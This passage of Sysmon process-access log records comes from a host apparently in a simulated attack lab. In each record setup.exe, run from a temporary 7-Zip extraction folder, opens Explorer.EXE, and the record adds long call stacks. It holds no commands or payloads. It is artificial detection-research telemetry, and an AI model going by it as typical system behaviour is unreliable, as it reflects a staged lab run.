a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
